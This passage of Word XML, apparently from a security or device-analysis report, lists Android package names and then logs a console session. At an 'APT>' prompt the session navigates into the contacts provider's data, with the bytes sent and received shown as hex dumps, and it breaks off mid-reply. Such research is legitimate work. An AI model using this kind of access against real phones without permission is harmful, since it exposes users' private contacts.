      </w:r>
    </w:p>
    <w:p w14:paraId="7CC9BE3A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>eu.optimalus.dziauz.tinyflashlight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6293B33A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.managedprovisioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F9129" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.emergency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2280AA9D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.documentsui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1DFEE9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.wallpaperpicker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C8FB20" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.vsrevogroup.revouninstallermobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3356C33B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.systemui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C88A6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.antimony.heartache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04631675" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.deskclock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68614B49" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.cts.ctsshim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779225FA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.certinstaller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7EEB1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.cts.priv.ctsshim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1CD457" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>rkr.simplekeyboard.inputmethod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360AF7DB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.vpndialogs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD355C3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.gallery3d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E0571" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.inputmethod.latin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56736D3B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.ap.SnapPhoto_Pro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25325E95" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.atomic.apps.ringtone.cutter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18632E0F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEAA435" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.qualcomm.timeservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA45EA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.backupconfirm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4918D8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.google.pixel.wahoo.gfxdrv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214AF375" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.wallpaperbackup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A92F0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.sharedstoragebackup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A93ED4F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.wallpapercropper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803CDA8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.printservice.recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F59DB2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.calculator2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAF6C35" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.calllogbackup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD73672" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.providers.blockednumber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5450A3BB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.providers.userdictionary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A6217D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.cerience.reader.app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F891B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.maxflame.barephone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401BC2B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.smspush</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04092A78" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAEDE1C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.keychain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458BD1EE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.google.android.diskusage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200177BF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B9D85" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.mtp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB6EDEE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.vavni.android.battleship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D28B9E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.esaba.downloader.browserplugin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843032B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.messaging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDD4922" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.quicksearchbox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4B8641" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256A2A7B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.shkmishra.instadict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EC735E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.threestar.gallery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E12D051" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.providers.settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE6DF2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.carrierdefaultapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645CB16E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>android.auto_generated_rro__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530FC4F7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.steinwurf.adbjoinwifi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F04292D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ca.jamdat.flight.bejeweled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC56F8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.explusalpha.A2600Emu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57916E10" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.webview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01385354" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.providers.downloads.ui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E16620" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.providers.downloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A17C4B3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>flenix.net.flenixapk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE1DB9E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.jmt.clockwidget</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB33F60" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.wallpaper.livepicker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A930CD6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>de.belu.appstarter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466021BE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.espn.score_center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FB521C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>android.ext.shared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489DF13" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.aiuspaktyn.s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683FD31C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.tveazy.online</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7392D912" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pl.net.szafraniec.latarka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639E8A10" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.che.wtd.client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542371D6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.captiveportallogin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED2F967" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.externalstorage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB6DC61" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.dreams.phototable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383147BC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.apps.tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5599D09C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.provision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E4DE4C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.onetimeinitializer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F30B31E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.music</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5477DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.bips</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35873DB1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ch.blinkenlights.android.vanilla</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20567210" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.bluetooth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F62A395" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.providers.calendar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A67D0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.carrierconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DD8ADA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.bhanu.torch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7524A36F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.mms.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199EDC27" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.openinwhatapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E707D56" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>org.iii.romulus.meridian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C853CC9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.server.telecom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E79BE43" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.inputdevices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8508F9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.companiondevicemanager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB6233B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.bookmarkprovider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F726221" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.statementservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B61B5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.android.proxyhandler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75502ECC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>com.nabin.lrrh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20204458" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10EA9DBE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>16:08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2373A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>APT&gt;cd com.android.providers.contacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD5E33" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sending: '7\x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00com.android.providers.contacts\x00' (55 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311391DC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 37 00 00 00 12 00 00 00 00 00 00 00 1F 00 00 00  7...............</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF7BC3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000010: 1F 00 00 00 00 00 00 00 63 6F 6D 2E 61 6E 64 72  ........com.andr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CBD5AF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000020: 6F 69 64 2E 70 72 6F 76 69 64 65 72 73 2E 63 6F  oid.providers.co</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D17F5A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">00000030: 6E 74 61 63 74 73 00                             ntacts.         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0F8560" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>received:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747C7A01" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>00000000: 1C 00 00 00 13 00 00 00 00 00 00 00 04 00 00 00  ................</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6661792A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
